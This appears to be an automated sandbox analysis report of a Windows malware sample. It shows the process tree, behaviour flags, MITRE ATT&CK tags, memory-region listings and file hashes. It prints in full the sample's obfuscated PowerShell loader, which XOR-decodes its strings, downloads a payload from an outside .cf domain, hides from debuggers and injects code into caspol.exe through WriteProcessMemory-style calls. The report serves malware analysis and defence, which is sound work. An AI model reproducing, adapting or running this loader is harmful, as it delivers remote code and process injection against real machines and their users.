yiInpPe7Kv)La Sa`$SlOMarOmgBjaTenEniVrstiaRetGy4Kv;Hi`$GuOSprThgMaaLanCaiMosOvaRotNo5Fr Ar=Op blDSteancInoTrlLoobarAmaadnTu0Sy2ni Af'an0ly4Ey1Al3Pa0No2Ud0Pa3Da0St4th1Vi8Re5To6Ka5Al2Hy3UnABa1Sk7Un1Me4In0EkFKu0Lu4Pr5Re8ka3Sh5At0Ma4Sn1Ch3In1Hu7Di0Sy2sk1In3lu2Si2Ma0BrFFr0Oc6in1Do3Ti5FoEDi5GrFEn'Ra;Do&Kl(Wa`$OuSAmermrEptLeuOvmGldChiHopBi7Da)Gi Fl`$ReOStrChgGlaAsnReiZasIsaIntEr5Sp Br ny Li;En}Co`$AtUBadSusZikUnrVeite6Ty5Tr Se=Pr ElDUneRecEgoEnlDioFrrSaaTinKl0Sh2Tr Be'Pr1NoDOa1Bi3Ci0Ha4El1Se8Ga1Su3Ty1OmASl4Cr5Te4Po4Ba'La;Le`$BrOGlrPrgAkaUnnSpiMusSmaSttHa6Wh De=To StDPreCocSpoDolinoBlrCaaUnnSk0St2se Sk'ko5He2It3Mo0Ku1StFHa1CaAAr1fi3mo0No4bo5Kr6Al4ToBMa5Bh6Ca2TrDUn2Re5Co0UnFMo0Ad5Me0Qu2Om1Sm3Qu1PhBAs5Bl8No2Ju4Un0Ma3pr1Ot8St0Ko2No1anFRe1SaBCo1de3Ud5Dk8Ti3FoFbe1Pl8Bo0Bu2Ta1Hu3Su0In4Su1Tr9Tr0Fo6Sa2sk5Fd1Du3Ku0de4Fo0Co0Ug1feFPe1Tr5Gt1il3Do0fe5Me5Re8Ca3KoBBa1Ou7Pe0En4Ef0In5In1FrERe1Cr7No1StAPa2EfBSi4TrCAn4YdCPr3Em1Af1Er3Un0Be2Co3Sm2Be1Un3Ve1maACa1Un3Pr1De1Ne1So7Gr0me2Bo1Ex3Pr3Se0me1Fr9Gr0Pr4Tr3Cy0Va0Bo3Dk1Qu8Ro1Fo5Fl0Th2Pe1WhFEn1Fl9In1Is8fr2Li6In1Gl9St1flFSm1Se8Ac0An2Sn1Br3Sk0Sk4Or5UtEEi5SpEOp1Da0Se1KaDIn0Dd6Re5Ba6Pi5An2Fe2ic3Ov1Ko2Os0ib5Di1SpDSu0Kl4Na1NyFfo4Ba0Ve4St3Re5Co6Sq5No2Ad2Ha5ko1Co3Un0Ac4Op0De2Pr0Ti3Fo1SuBSa1Jo2To1AfFSm0Vi6En4Ka2Cr5AnFUn5UdAOu5Ph6Te5brEBa3Sl1Fr3Fo2Sl2Pi2Pe5he6No3La6Ud5KoEFo2GeDUn3stFLe1De8So0Ri2Sc2No6Au0Ru2Ux0Sy4Hu2CiBUn5peAPs5te6Op2SlDSt2ld3Dg3ReFRi1Pa8Su0Tr2Wi4Ma5St4Co4Bu2OvBtr5MiAFi5St6Ta2BiDAf2Be3As3ViFSe1Se8ul0bo2Ji4Am5Sa4Om4Ag2SuBGa5CrAIs5Tr6Be2TrDKa2Re3Sk3InFpo1Ov8Co0pe2Th4In5Sl4Hi4ox2HeBSk5KlFPr5St6El5NeECo2SaDLe3ChFAg1Un8Sp0Zo2Ae2Do6To0Au2Du0ov4Pa2KeBPe5EsFHu5SoFSn5BaFAn'kn;Co&Sa(ca`$NoSOzeTirFutInuInmSudAuiOfpUd7De)ro Ha`$OvOSprVagNiaMenMuiAfsSpaHotSt6Sn;Sp`$StITrnRecInlSm Fo=Ar ShfZakBrpCi Ji`$ImSPleDirSttFouunmRudCyiTipSl5He Be`$EuSReeTyrAftWaugamThdKoiObpMy6Sk;Ch`$IlOBrrPegHyaManLeiDosExaFatRh7Go Ba=Va MaDWheskcAaoPrlSsoInrBlaBonBe0Di2La Be'Bo5Kl2Bu3gl0Re1CoFAu1RaAUn0Li2Tr1SiEUn1AnFBr4Be5Sn5em6Se4RaBOc5Co6No5Ud2In3So0Li1reFMu1GoAor1Re3Sv0Mi4He5De8Co3JoFYa1Mo8Am0Re0Re1Fi9Ue1biDDi1Cy3St5LiEKi2UdDMa3PoFEr1Kl8Se0Bl2Pi2Pa6fo0Lu2Ti0Sp4Dr2ZiBNo4BeCFe4UtCBy2BrCMe1Ap3Su0Fa4Ud1Br9Je5ShAFa5Va6Ej4De0Ra4Hu2Me4Un4Un5GtANo5Sl6Me4Do6En0HdEag4Un5Bl4Ch6Fu4Ti6In4Ju6Pe5RoAko5Ce6Dy4Vo6Al0SiESt4Pe2St4Em6St5LyFSe'Fo;Af&Ga(Hu`$MoSDieHarVatSeuGamTrdboiTtpPi7Mo)Re Fl`$spOAbrAtgfoafonToiStsNeaSutRe7Po;fi`$SkOForKogBlaBynFliExsSpaKatHo8Ne Un=Va UdDDeeUdcPooOtlCioRerAfaTrnVe0Ca2In Sa'Gr5Se2Ha2Vr5Sk0Kd0Un1HjFEl1Mo8Tr1BiDLa1Si3Or0Se4an1KaFSn5Re6Ka4FoBTh5Br6Sh5Dr2El3Zi0Pa1BrFTj1SkALe1Po3So0Ge4Si5Mi8tr3poFal1Be8De0Dr0St1Fr9Af1AnDSy1Ne3Fo5DuEPr2DoDKr3BlFFl1Ne8ih0Ma2bi2Ge6La0Bu2Ke0St4Pa2cuBWi4JeCHo4SeCRd2ElCPr1Sa3St0Pa4Rh1Bi9Hu5FoAVi5Bu6Bo4Ch1En4Fd7Sk4Bi5Sk4AnFMa4Ti1Ho4Se5Fo4Be1Ur4ja0Co5FrAHe5Fr6Re4Ko6La0CrEKo4te5Lr4Ci6Te4Br6Ba4su6Du5DdAEr5Ti6Be4Tv6Sk0UnEFl4St2Su5JoFTo'Ba;Im&Wa(Se`$MiSIneStrUdtMouStmUndEfiArpHe7Sh)Li Ch`$AfOPrrFogNeaChnDyiWrsFeaPetGe8Be;Kn`$InDHaeSucReoLelAfoImrSyaDanEn0Ou1tu Tr=Ja Ti'KlhSstKotFrpEn:Pa/bl/GamSueElgReoFooMakDibDupUnnPrqDu.FocMyfRe/caKopvEliPenSr.BysTanAbpRa'De;Re`$NaDMeeOccSaoDulSpoberTraUnnma0Ge0Ch Bi=So WhDHyeMacRooKalTroDgrRuaSmnAr0Ep2Gr Be'Pr5op2Ve2Un4Ha0kn3Be1St2Fr1Pe3sk1OmDSu0wh3Dr0Ch0Ca1Da3Nr5Hu6Ir4kaBHa5La6Op5FeEEf3Sa8Fo1Wi3Sj0Gr1Hy5AcBJe3pa9Ra1My4Pr1NoCBe1Ba3Sk1Fo5In0Co2Bo5Gi6Ka3Fl8ta1Ko3Re0No2da5Sy8Mu2ba1Pr1So3Ma1Pr4Pa3Co5la1fiAUn1InFAq1Si3re1Sc8Dk0Al2Es5StFBu5Kn8Be3Be2Ro1Va9In0Mo1Re1So8In1deAKu1As9Sk1Es7Ca1To2St2En5ch0In2Mo0Di4Ki1SeFNi1Au8Sn1Fr1Bo5NiESp5Ga2va3Bo2Br1hi3In1Aa5St1ge9af1SkAVg1Br9Is0Bi4Sp1br7Ro1De8L 4Es6Pi4Mo7Fi5CaFDd'Gy;Sk`$ReODarkigSaaFlnkliMasSnaFittr8Co Me=Go DeDPueStcAnoColSlojurReaSknDa0al2Si Au'Po5Op2Sy3Al0Ot1miFUn1PeALi0Ba2De1KoETo1brFDe4Bf4Da4GrBAp5Es2Ki1Sa3By1Fo8Sk0Ap0Di4AgCAn1Ae7ca0Pl6Ch0Mo6sm1Ta2Co1Pn7Ga0fo2Wi1Hy7Ir'Em;gr&Tu(Ha`$BdSHaeCerSktPruSymVedSmiSapDi7Ch)Af Do`$ElOforKegSaaKonSliSjsDeaCrtNy8Te;Pr`$BrFspiDolTptTihAbiBo2To=Ru`$CuFPeiKolFatFrhSkiaf2Br+mo'Ta\PoBRenFokTieravBiaEr.RedEkaLstPa'Ti;re`$UnRUnuPadaleFukHjuSvvFrePr=Am'Na'Th;UgiTefHy un(Ph-GunFroSptUv(UnTSkeFusPrtCa-UnPHeaIntNohKa Sp`$alFTeiSylBetFahEriUn2Bd)Sv)Ce Af{FowGahAniRelLieSm Af(Ve`$LiROcuHidKneObkScunovMiePa Ar-OveFoqBl Bu'Fo'Ka)Fo Fo{Ou&Me(Sy`$CoSNoePrrGetInuMamSudDeiPrpOp7De)Re Sk`$ScDBoeIdcProOplNooKlrGaaInnFl0Fo0Te;ReSGytJuaPrrNotUd-OuSbulTieBeeTepar Th5Ha;As}DeScoeAutSu-OsCUdoSonHutBueBanRotcr Bu`$PtFBriFelTitPuhReiAd2Io Im`$FrRKruMudpaeRakFiuRevSieSy;Fe}Re`$MuRLouEldHveUdkCouPrvLeeJg Ov=Ex koGuneDotBe-LoCUdoSqnChtMeeRunBrtma Br`$ErFdbiRtlRitGahTeiTe2Pl;Pr`$BlOInrRagMeabjnFriArsSkaFitEx9Pu re=Gr GrDAmeOvcNooSklMaoRvrVaaHonSn0He2St fe'Zo5Se2Ox3Em9Ov0tj4Sh1Aa1Io1Ud7Ch1Do8Gu1unFRi0Me5Be1lg7Ud0No2Re5Un6Tr4SkBVa5Sl6He2LoDUn2Sk5Wi0RaFVi0he5Pr0Kl2Un1Ru3Fi1UnBPe5Ad8Un3ex5Ov1Ma9Dr1Be8St0En0Ma1To3Ad0Fi4Fl0Br2Sk2FoBBa4HeCPs4BaCVr3Ep0Lu0Ek4St1Rd9Sk1ArBsk3re4De1ti7Me0Gr5To1Ka3Ca4De0Fr4Oc2Mo2Xy5Up0Dd2pl0Dr4Hu1coFRa1Un8Em1Ba1Pa5haEFo5Un2Un2Ha4at0Il3Ll1Un2Re1Au3De1SnDFu0Tm3ca0pe0Al1By3Ma5suFSu'Se;Ma&Po(Ud`$BrSTeeBarCutBeuCemChdBaiFlpVa7Sl)Un Re`$FoOUnrPlgHaaUdnBeiHisFiaPhtTr9Fo;Mi`$LaRInuStdFreTikPeukavVeeHj0Ga Ot=Eu VaDFoeKlcThoTrlVooOurUnaEnnMi0Sl2Va Sn'En2StDCa2Fr5Gl0EmFKa0Br5Sa0To2Su1St3in1LaBFu5Ti8Sp2Ko4Ki0Sn3kv1Ho8Ru0Sl2Fo1RaFOv1reBKo1Ek3Br5Hy8Ku3KaFHo1Po8Pe0Bl2Vi1Ba3ve0Me4No1Mo9ti0Di6Dr2Fo5Kk1sa3Un0Be4Ov0So0sp1SmFTi1Ta5Gr1Ku3in0Mu5Be5Cy8Af3CoBNo1Sy7ko0Hr4Ma0Ve5ta1FaESt1Ba7Fl1BeASu2NoBMe4BuCSh4ReCIm3Pl5Fo1sf9Sl0Ty6Be0MoFPr5TeEKr5Ba2Sa3Ha9po0Ob4Mo1Ev1Bo1Sp7Po1Do8Si1CaFEt0Ar5Da1Cr7so0Un2fo5FjAEp5Bl6St4dg6te5WiAle5Ov6Pl5Ba6fa5Fa2Un3Re0Mo1muFPe1VeAOk0Gu2Re1KuEfo1ElFIm4Pr5No5RaAOb5Gy6Co4Be0Dr4Se2Al4Af4St5SaFDe'Me;Lu&In(Is`$ErSBrerarMutNeuSomvvdHaiTrpFo7Le)Ni Sp`$SpRTuuNadKreSukbouNovByeRe0Un;ar`$meCUnhChlbeoFerOmiCacFrpEv=No`$HjOFerGaganaHenSaiClsKaamdtRe.SicInoAnuAfnSktVi-Ko6Zy4Fr2Rr;Di`$PrRBeuRedreePrkemuInvFieSt1Va Mu=mo SuDFreTacSooHjlPioKirTaaEgnOm0ov2Si Re'De2OpDhe2Pa5In0anFPu0Ba5Ko0Da2ol1Fu3Pa1ToBPs5Pl8Gr2Op4Ba0Rr3Be1Gl8He0Sa2Tr1HuFoc1PyBEk1Gr3sp5Al8In3OrFMl1Bu8Il0to2Ca1Di3Et0Wh4St1Li9Om0Go6Ma2Mi5Pa1Re3ge0Sv4Hj0Un0Un1KaFGe1Ka5En1Ha3Cr0Mi5Re5En8Pr3GaBBe1Fi7Pu0Br4Ro0In5Sk1LiERe1Ug7Ha1VaAPr2TeBre4BeCYo4FiCre3Du5Tu1Co9Ga0Ba6Ga0AfFVa5TeEAs5bl2th3El9Oc0Sp4Re1La1Ki1Hy7Un1Mi8Sr1ReFAn0Mo5Op1Ta7Am0Gr2De5OvAIr5hy6Sd4Sl0Dr4Bl2Tu4Ju4Sl5TeAHo5Ef6De5Ud2Gr2Ju5Ri0Ba0Id1anFCi1Di8Di1PaDBe1Tu3Fo0Pr4No1FlFAl5RuAId5Ci6Go5Pr2ko3By5Di1GeEBa1NyACo1ge9Ly0No4St1FiFEx1fr5Bu0ju6Fo5FiFFo'Te;Ab&Jo(Un`$VoSSueStrEftEpuchmStdMeiPrpTa7Fo)sy Ba`$ExRPouNodKoeRikNeuVivLoeEn1Ud;ud`$LiRSauGldKleTrkRluAavAbeRe2Di Be=Ge ViDSkeVecLooRelEloSkrKuaDenBo0Bu2Ph Hy'Lo5me2un3TjBDe1Su3De1Sa1Ph1Ga7Tr5Tr6Be4UdBBr5Sl6un2RiDTf2st5Ov0DeFCo0Ku5Qu0Im2ch1Ga3Ax1AcBTi5Am8Ud2Ba4Se0Se3Be1My8Kn0Ez2Br1boFUd1DeBNo1Ha3ca5ho8Be3SpFQu1un8Vi0Kn2Pe1Co3Sh0Ho4Hy1Sp9Ka0Sl6Wh2Ba5Di1Mi3Un0Af4br0Ku0La1MeFNi1ha5Ni1Si3St0Ce5My5Er8Ta3SkBUn1Na7Ad0Un4Ga0Al5Hu1ToEMa1Re7Sp1ImASc2SvBCl4CoCGe4OpCFr3In1ra1Sp3gr0Ox2Un3Ch2Tr1Ma3In1BrASt1Ae3So1Hj1Pl1Ny7Pa0Te2Ta1Mi3Ni3Ud0Ca1Ca9Di0ch4up3Ka0Ay0Un3Sa1Ov8Fr1St5Sa0Br2De1JaFEl1Ma9Fo1Wa8Du2He6So1Hj9Bi1StFba1Ap8Sa0Go2St1Pi3To0Br4Pr5MoETi5CaEBe1An0Br1liDPu0Sl6Sp5Ho6El5Cl2Sl3Ma9Mu1Ou2Vi1TaFUr1trAMc1Un9Co1jaBMh1ek3Co1Sk2Mr5Tr6Ta5Ve2Qu2Gr4Dr1Un3Mi0Ve6ha0In4Pu1Ef9De1Sp1Wi0Af4Te1Br7An1flBTr0Li5Be5ReFTr5FrAhr5fo6Br5BrEsa3cr1Re3Th2Fi2Ty2Pa5Me6Ha3Ko6Ad5afEhy2UoDRe3ApFSe1ju8Na0Co2Om2Ba6Mo0Op2Pr0Al4Ma2LuBst5PhADr5Mo6op2MaDTe3SpFDe1Ga8Cr0Ja2Br2Du6sc0un2Bu0Kn4Er2ReBCo5nsADi5As6Te2BeDOv3FrFHe1Wo8Mu0ra2Uf2Fe6Dy0Sp2Sp0Mi4Ru2StBOu5PoACl5Ba6co2BeDfe3GoFMe1Si8Lo0Sa2Ir2Ur6An0Pl2En0St4Br2blBVi5MaAGr5jg6Ti2FiDte3TeFUn1Sp8Lo0In2Ka2Lu6Ba0Sy2Ba0Un4Lu2SeBAl5MoFBr5Ve6Bo5SkEIn2ViDFl3RkFPo1In8Fa0Sa2Mi2Pr6Sn0Pa2Re0Sk4Re2SkBFa5ThFka5SyFKu5KeFnu'Us;Fo&Fi(Ud`$SaSKaeGgrAntInuRomSudApiBrpSt7An)Ga Po`$CaRFluSpdGaeTrkInuJovPeeAf2De;Bl`$SpRmauLydTheBakaguBevTieHv3Pl Na=Mi FaDAfeShcVaoKolKuoLarThaGenMd0Ch2Os ya'Aa5Me2Co3AaBSp1Ly3Ob1Da1Sp1Re7De5Do8Nu3PoFSc1Or8An0St0Af1Vk9Tu1HaDSe1Ko3Ke5ChENo5Ha2Re3Bl0Me1FoFMy1PrASy0In2Sh1HyEbe1MaFRb4Va5sw5FoABa5Sk2Ac2Tr5Fa0Kv0Fo1DiFBr1Un8Co1IlDsk1Re3Bu0Fr4fa1UrFFa5TaAdi5Pr2so3stFFo1In8Pe1Bo5Re1DeAUl5AuAOy4No6Wr5PrAIm4to6Nd5KrFkr'Dr;Ch&Nu(Kb`$FoSToeFirUrtTruOvmAfdmaiHapSl7Un)He th`$ArRFauSydaceInkTkuInvUneHa3Fr#Pr;""";Function Rudekuve9 ([String]$Reproduc) { For($Bagva=2; $Bagva -lt $Reproduc.Length-1; $Bagva+=(2+1)){$Decoloran = $Decoloran + $Reproduc.Substring($Bagva, 1)}; $Decoloran;}$Udnyt0 = Rudekuve9 'OvIEiELiXAk ';$Udnyt1= Rudekuve9 $Overnu;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Udnyt1 ;}else{&$Udnyt0 $Udnyt1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4180
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Decoloran02 { param([String]$Reproduc); $Tannog = ''; Write-Host $Tannog; Write-Host $Tannog; Write-Host $Tannog; $Choke = New-Object byte[] ($Reproduc.Length / 2); For($Bagva=0; $Bagva -lt $Reproduc.Length; $Bagva+=2){ $Choke[$Bagva/2] = [convert]::ToByte($Reproduc.Substring($Bagva, 2), 16); $Choke[$Bagva/2] = ($Choke[$Bagva/2] -bxor 118); } [String][System.Text.Encoding]::ASCII.GetString($Choke);}$Chut0=Decoloran02 '250F0502131B58121A1A';$Chut1=Decoloran02 '3B1F1504190519100258211F184544582318051710133817021F00133B13021E191205';$Chut2=Decoloran02 '3113022604191537121204130505';$Chut3=Decoloran02 '250F0502131B58240318021F1B13583F180213041906251304001F151305583E1718121A13241310';$Chut4=Decoloran02 '0502041F1811';$Chut5=Decoloran02 '3113023B1912031A133E1718121A13';$Chut6=Decoloran02 '2422250613151F171A38171B135A563E1F1213340F251F115A562603141A1F15';$Chut7=Decoloran02 '240318021F1B135A563B171817111312';$Chut8=Decoloran02 '2413101A131502131232131A1311170213';$Chut9=Decoloran02 '3F183B131B19040F3B1912031A13';$Sertumdip0=Decoloran02 '3B0F32131A1311170213220F0613';$Sertumdip1=Decoloran02 '351A1705055A562603141A1F155A562513171A13125A563718051F351A1705055A5637030219351A170505';$Sertumdip2=Decoloran02 '3F1800191D13';$Sertumdip3=Decoloran02 '2603141A1F155A563E1F1213340F251F115A56381301251A19025A56201F040203171A';$Sertumdip4=Decoloran02 '201F040203171A371A1A1915';$Sertumdip5=Decoloran02 '1802121A1A';$Sertumdip6=Decoloran02 '380226041902131502201F040203171A3B131B19040F';$Sertumdip7=Decoloran02 '3F332E';$Sertumdip8=Decoloran02 '2A';$Odilomed=Decoloran02 '232533244544';$Reprograms=Decoloran02 '35171A1A211F181219012604191537';function fkp {Param ($Enditin, $cerebrat) ;$Organisat0 =Decoloran02 '52311714131812031B564B565E2D37060632191B171F182B4C4C3503040413180232191B171F1858311302370505131B141A1F13055E5F560A56211E1304135B39141C131502560D56522958311A1914171A370505131B141A0F3517151E13565B371812565229583A191517021F19185825061A1F025E5225130402031B121F064E5F2D5B472B58330703171A055E52351E0302465F560B5F58311302220F06135E52351E0302475F';&($Sertumdip7) $Organisat0;$Organisat5 = Decoloran02 '52250F1802171D050204564B5652311714131812031B583113023B13021E19125E52351E0302445A562D220F06132D2B2B56365E52351E0302455A5652351E0302425F5F';&($Sertumdip7) $Organisat5;$Organisat1 = Decoloran02 '0413020304185652250F1802171D050204583F1800191D135E5218031A1A5A56365E2D250F0502131B58240318021F1B13583F180213041906251304001F151305583E1718121A132413102B5E3813015B39141C13150256250F0502131B58240318021F1B13583F180213041906251304001F151305583E1718121A132413105E5E3813015B39141C131502563F18022602045F5A565E52311714131812031B583113023B13021E19125E52351E0302435F5F583F1800191D135E5218031A1A5A56365E523318121F021F185F5F5F5F5A565215130413140417025F5F';&($Sertumdip7) $Organisat1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Algeris230,[Parameter(Position = 1)] [Type] $Svajendep = [Void]);$Organisat2 = Decoloran02 '523A17140F04564B562D37060632191B171F182B4C4C3503040413180232191B171F18583213101F1813320F18171B1F15370505131B141A0F5E5E3813015B39141C13150256250F0502131B582413101A1315021F191858370505131B141A0F38171B135E52351E03024E5F5F5A562D250F0502131B582413101A1315021F191858331B1F0258370505131B141A0F34031F1A1213043715151305052B4C4C2403185F583213101F1813320F18171B1F153B1912031A135E52351E03024F5A565210171A05135F583213101F1813220F06135E5225130402031B121F06465A565225130402031B121F06475A562D250F0502131B583B031A021F1517050232131A13111702132B5F';&($Sertumdip7) $Organisat2;$Organisat3 = Decoloran02 '523A17140F04583213101F181335191805020403150219045E52351E0302405A562D250F0502131B582413101A1315021F19185835171A1A1F1811351918001318021F1918052B4C4C25021718121704125A5652371A1113041F054445465F582513023F1B061A131B13180217021F1918301A1711055E52351E0302415F';&($Sertumdip7) $Organisat3;$Organisat4 = Decoloran02 '523A17140F04583213101F18133B13021E19125E5225130402031B121F06445A565225130402031B121F06455A56522500171C13181213065A5652371A1113041F054445465F582513023F1B061A131B13180217021F1918301A1711055E52351E0302415F';&($Sertumdip7) $Organisat4;$Organisat5 = Decoloran02 '04130203041856523A17140F0458350413170213220F06135E5F';&($Sertumdip7) $Organisat5 ;}$Udskri65 = Decoloran02 '1D130418131A4544';$Organisat6 = Decoloran02 '52301F1A1304564B562D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C31130232131A131117021330190430031815021F191826191F180213045E5E101D0656522312051D041F4043565225130402031B121F06425F5A565E31322256365E2D3F18022602042B5A562D233F180245442B5A562D233F180245442B5A562D233F180245442B5F565E2D3F18022602042B5F5F5F';&($Sertumdip7) $Organisat6;$Incl = fkp $Sertumdip5 $Sertumdip6;$Organisat7 = Decoloran02 '52301F1A021E1F45564B5652301F1A1304583F1800191D135E2D3F18022602042B4C4C2C1304195A564042445A56460E454646465A56460E42465F';&($Sertumdip7) $Organisat7;$Organisat8 = Decoloran02 '5225001F181D13041F564B5652301F1A1304583F1800191D135E2D3F18022602042B4C4C2C1304195A564147454F414541405A56460E454646465A56460E425F';&($Sertumdip7) $Organisat8;$Decoloran01 = 'http://megookbpnq.cf/Kvin.snp';$Decoloran00 = Decoloran02 '52240312131D030013564B565E3813015B39141C1315025638130258211314351A1F1318025F58321901181A1917122502041F18115E52321315191A1904171846475F';$Organisat8 = Decoloran02 '52301F1A021E1F444B521318004C17060612170217';&($Sertumdip7) $Organisat8;$Filthi2=$Filthi2+'\Bnkeva.dat';$Rudekuve='';if (-not(Test-Path $Filthi2)) {while ($Rudekuve -eq '') {&($Sertumdip7) $Decoloran00;Start-Sleep 5;}Set-Content $Filthi2 $Rudekuve;}$Rudekuve = Get-Content $Filthi2;$Organisat9 = Decoloran02 '5239041117181F051702564B562D250F0502131B58351918001304022B4C4C3004191B3417051340422502041F18115E52240312131D0300135F';&($Sertumdip7) $Organisat9;$Rudekuve0 = Decoloran02 '2D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C3519060F5E5239041117181F0517025A56465A565652301F1A021E1F455A564042445F';&($Sertumdip7) $Rudekuve0;$Chloricp=$Organisat.count-642;$Rudekuve1 = Decoloran02 '2D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C3519060F5E5239041117181F0517025A564042445A565225001F181D13041F5A5652351E1A19041F15065F';&($Sertumdip7) $Rudekuve1;$Rudekuve2 = Decoloran02 '523B131117564B562D250F0502131B58240318021F1B13583F180213041906251304001F151305583B1704051E171A2B4C4C31130232131A131117021330190430031815021F191826191F180213045E5E101D06565239121F1A191B1312565224130604191104171B055F5A565E31322256365E2D3F18022602042B5A562D3F18022602042B5A562D3F18022602042B5A562D3F18022602042B5A562D3F18022602042B5F565E2D3F18022602042B5F5F5F';&($Sertumdip7) $Rudekuve2;$Rudekuve3 = Decoloran02 '523B131117583F1800191D135E52301F1A021E1F455A5225001F181D13041F5A523F18151A5A465A465F';&($Sertumdip7) $Rudekuve3#"
    3⤵
    - Blocklisted process makes network request
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4712
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      PID:2304
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      PID:4880
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 1860
        5⤵
        Program crash
        
        PID:1300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4880 -ip 4880
1⤵
PID:2944

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
612b19feac3b60bdc771ec888769ea75

SHA1
cc0117dc3f83e139f22d7c9f068a0fa2027fc8fb

SHA256
3eb12f5e02a7aad8764186e1f62d9cebcc8667c854ebf4356fe404f042b84ec1

SHA512
2f56333015641eb11b853a350ca5a01763ab9fd2d572fca51ba2d7df3018546c9667a64ba670e443e0fef5c10879964bfe18084ae0b44e95cb17dcc864ffd4af

Download Submit
memory/4180-139-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

Filesize
10.8MB

Download
memory/4180-171-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

Filesize
10.8MB

Download
memory/4180-153-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

Filesize
10.8MB

Download
memory/4712-154-0x0000000008870000-0x000000000CC87000-memory.dmp

Filesize
68.1MB

Download
memory/4712-158-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4712-141-0x0000000005310000-0x0000000005346000-memory.dmp

Filesize
216KB

Download
memory/4712-142-0x0000000005AD0000-0x00000000060F8000-memory.dmp

Filesize
6.2MB

Download
memory/4712-143-0x00000000059D0000-0x00000000059F2000-memory.dmp

Filesize
136KB

Download
memory/4712-144-0x0000000006100000-0x0000000006166000-memory.dmp

Filesize
408KB

Download
memory/4712-145-0x0000000006170000-0x00000000061D6000-memory.dmp

Filesize
408KB

Download
memory/4712-146-0x0000000006890000-0x00000000068AE000-memory.dmp

Filesize
120KB

Download
memory/4712-147-0x00000000081F0000-0x000000000886A000-memory.dmp

Filesize
6.5MB

Download
memory/4712-148-0x0000000006DD0000-0x0000000006DEA000-memory.dmp

Filesize
104KB

Download
memory/4712-149-0x0000000007B70000-0x0000000007C06000-memory.dmp

Filesize
600KB

Download
memory/4712-150-0x0000000007AB0000-0x0000000007AD2000-memory.dmp

Filesize
136KB

Download
memory/4712-151-0x000000000CC90000-0x000000000D234000-memory.dmp

Filesize
5.6MB

Download
memory/4712-170-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4712-169-0x0000000008870000-0x000000000CC87000-memory.dmp

Filesize
68.1MB

Download
memory/4712-160-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4712-155-0x00007FF981CD0000-0x00007FF981EC5000-memory.dmp

Filesize
2.0MB

Download
memory/4712-156-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4784-136-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

Filesize
10.8MB

Download
memory/4784-134-0x000001BA59AE0000-0x000001BA59B02000-memory.dmp

Filesize
136KB

Download
memory/4784-152-0x00007FF963CA0000-0x00007FF964761000-memory.dmp

Filesize
10.8MB

Download
memory/4880-162-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4880-161-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4880-165-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/4880-166-0x00007FF981CD0000-0x00007FF981EC5000-memory.dmp

Filesize
2.0MB

Download
memory/4880-167-0x0000000000B00000-0x0000000004F17000-memory.dmp

Filesize
68.1MB

Download
memory/4880-168-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
1.6MB

Download
memory/4880-163-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/4880-159-0x0000000000B00000-0x0000000004F17000-memory.dmp

Filesize
68.1MB

Download
memory/4880-172-0x00000000247E0000-0x0000000024872000-memory.dmp

Filesize
584KB

Download
memory/4880-173-0x0000000024750000-0x000000002475A000-memory.dmp

Filesize
40KB

Download
memory/4880-174-0x0000000077820000-0x00000000779C3000-memory.dmp

Filesize
